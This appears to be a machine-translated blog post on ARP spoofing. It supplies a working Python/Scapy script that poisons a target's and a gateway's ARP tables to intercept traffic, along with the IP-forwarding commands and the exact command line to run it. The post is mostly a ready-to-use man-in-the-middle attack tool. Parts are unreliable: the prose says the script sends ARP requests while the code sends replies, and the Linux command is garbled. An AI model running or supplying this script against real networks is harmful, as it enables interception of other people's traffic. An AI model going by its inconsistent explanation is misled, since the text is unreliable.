ARP spoofing with python

ARP spoofing

First of all, I will explain what ARP is in my own way. (I think it's easy to understand if you make a figure) In communication within the local area (Layer 2 or lower), the MAC address is checked from the IP address, and communication is performed based on that MAC address. That is why the ARP protocol is in charge of the part of "finding the MAC address from the IP address". Now that you have a rough idea of how ARP works, ARP spoofing is inconvenient because the operation of finding the MAC address from the IP address becomes heavy and inconvenient if you do it every time you communicate. Actually, the terminal owns the data that says "This IP address is this MAC address". And it is ARP spoofing that tries to change (deceive) the corresponding data (hereinafter referred to as ARP table). If you do this, you will send packets that would otherwise be sent to the router to the attacker's terminal, and you can also change the router's ARP table to break into communication. The following program is doing the following:

  1. Send an ARP request packet disguised as a gateway or target. (You can break it with this)
  2. Send the correct ARP packet before terminating the program and return to normal communication. The point is 1. Many ARP spoofing tools send a reply every second instead of an ARP request and interrupt at the timing when the ARP table of the attack target is updated. Now you have to wait until it's time to update the ARP table. My implementation uses the lesser-known specification "ARPP table is rewritten by ARP request".
#coding:utf-8
from scapy.all import *
import time
import sys

conf.verb = 0
gateway_ip = sys.argv[1]  
gateway_mac = sys.argv[2]
target_ip = sys.argv[3]
target_mac = sys.argv[4]
def main():
	try:
		print "[*] Start ARPspoofing..."
		poison_target(target_ip,target_mac,gateway_ip,gateway_mac)
	except KeyboardInterrupt:
		pass
	finally:
		time.sleep(2)
		restore_table(gateway_ip,gateway_mac,target_ip,target_mac)
		sys.exit(0)

def poison_target(target_ip,target_mac,gateway_ip,gateway_mac):
	poisoning_target = Ether(dst=target_mac)/ARP()
	poisoning_target.op = 2
	poisoning_target.psrc = gateway_ip
	poisoning_target.pdst = target_ip

	poisoning_gateway = Ether(dst=gateway_mac)/ARP()
	poisoning_gateway.op = 2
	poisoning_gateway.psrc = target_ip
	poisoning_gateway.pdst = gateway_ip

	while True:
		sendp(poisoning_target)
		sendp(poisoning_gateway)
		time.sleep(5)
	print "[*] Finished."
	return

def restore_table(gateway_ip,gateway_mac,target_ip,target_mac):
	print "[*] Restoring target."
	send(ARP(op=1,psrc=gateway_ip,hwsrc=gateway_mac,pdst=target_ip,hwdst=target_mac),count=3)

if __name__=="__main__":
	main()

For mac

sudo sysctl -w net.inet.ip.forwarding=1

For Linux

sudo sysctl -w sudo sysctl -w net.ipv4.ip_forward=1

To run

sudo python arpspoofing.py gateway IP gateway MAC target IP target MAC

All the transmitted packets of the terminal specified by the target will fly to your terminal.

problem

Previously, the MAC address of the other party (gateway, target) was obtained by broadcasting, but the MAC address of your terminal (attacker) included in the request packet sent at that time is specified. I decided to specify it because the MAC address may be duplicated when performing ARP spoofing because it gets on the ARP table. However, since the attacker's MAC address exists in the gateway before performing ARP spoofing, there will be duplication. .. So, as a solution I think now, I'm thinking of spoofing the attacker's MAC address. It may be a virtual machine

Referenced book https://www.oreilly.co.jp/books/9784873117317/

Recommended Posts

ARP spoofing with python
FizzBuzz with Python3
Scraping with Python
Scraping with Python
Python with Go
Twilio with Python
Integrate with Python
Play with 2016-Python
AES256 with python
Tested with Python
python starts with ()
with syntax (Python)
Bingo with python
Zundokokiyoshi with python
Excel with Python
Microcomputer with Python
Cast with python
I tried ARP spoofing
ARP spoofing with python
Serial communication with Python
Zip, unzip with python
Django 1.11 started with Python3.6
Python with eclipse + PyDev.
Socket communication with Python
Data analysis with python 2
Scraping with Python (preparation)
Try scraping with Python.
Learning Python with ChemTHEATER 03
Sequential search with Python
"Object-oriented" learning with python
Handling yaml with python
Solve AtCoder 167 with python
Serial communication with python
[Python] Use JSON with Python
Learning Python with ChemTHEATER 05-1
Learn Python with ChemTHEATER
Run prepDE.py with python3
I tried ARP spoofing
1.1 Getting Started with Python
Collecting tweets with Python
Binarization with OpenCV / Python
3. 3. AI programming with Python
Kernel Method with Python
Scraping with Python + PhantomJS
Drive WebDriver with python
[Python] Redirect with CGIHTTPServer
Voice analysis with python
Think yaml with python
Operate Kinesis with Python
Use DynamoDB with Python
Zundko getter with python
Handle Excel with python
Ohm's Law with Python
Run Blender with python
Python starting with Windows 7
Heatmap with Python + matplotlib
Multi-process asynchronously with python
Python programming with Atom
Learning Python with ChemTHEATER 02
Use Python 3.8 with Anaconda
Install Voluptuous with Python 2.5
ScreenShot with Selenium (Python)